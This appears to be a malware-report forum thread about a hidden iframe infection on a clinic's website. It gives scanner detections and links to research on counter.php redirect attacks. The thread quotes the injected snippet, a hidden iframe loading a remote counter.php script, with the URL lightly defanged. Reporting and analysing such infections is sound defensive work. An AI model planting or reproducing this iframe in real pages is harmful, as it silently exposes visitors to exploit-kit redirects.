Hidden malicious iFrame malware: http://killmalware.com/family-clinics.com/#
Detected: https://www.virustotal.com/nl/url/202757a063457d8d7343f27cc071462f91a2e79a5d0757372aafdb454d1aed38/analysis/1414593673/
ISSUE DETECTED DEFINITION INFECTED URL
Website Malware malware-entry-mwiframeenc1560 htxp://family-clinics.com
Website Malware malware-entry-mwiframeenc1560 htxp://www.family-clinics.com
Website Malware malware-entry-mwiframeenc1560 htxp://www.family-clinics.com ( View Payload )
Website Malware MW:BLK:2 htxp://family-clinics.com ( View Payload )
Known javascript malware. Details: http://sucuri.net/malware/malware-entry-mwiframeenc1560
<iframe src="htxp://radio-motorola.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
I{ badness history: https://www.virustotal.com/nl/ip-address/66.147.244.81/information/
avast! Webshield detects as JS-Iframe.DOI[Trj]
pol
Pondus
2
Nice article on counter.php redirecting attacks: http://threatpost.com/counter-php-found-redirecting-to-sites-peddling-styx-exploit-kit/101967 article author Chris Brook
And from author Vincente Diaz: http://securelist.com/blog/incidents/57478/visit-from-an-old-friend-counter-php/
As we have established above it will stay with us for the foreseeable future.
Just 675 results pop-up om a search query where we combine killmalware dot com and the term counter.php
and already 11.700 (I do not know how many are actually relevant malcoded examples) for urlquery dot net and counter.php.
Interesting to follow the IDS alerts for the results that are turned up, for instance: https://urlquery.net/report.php?id=1414133151366
More intersting is to search on analyses like: www.malware-traffic-analysis.net counter.php as part of redirecting JS.
Read: http://webhosting.bigresource.com/Counter-PHP-Exploit-Techniques-rxWbmoXz.html source: BigResource Webmaster Tracker info.
Damian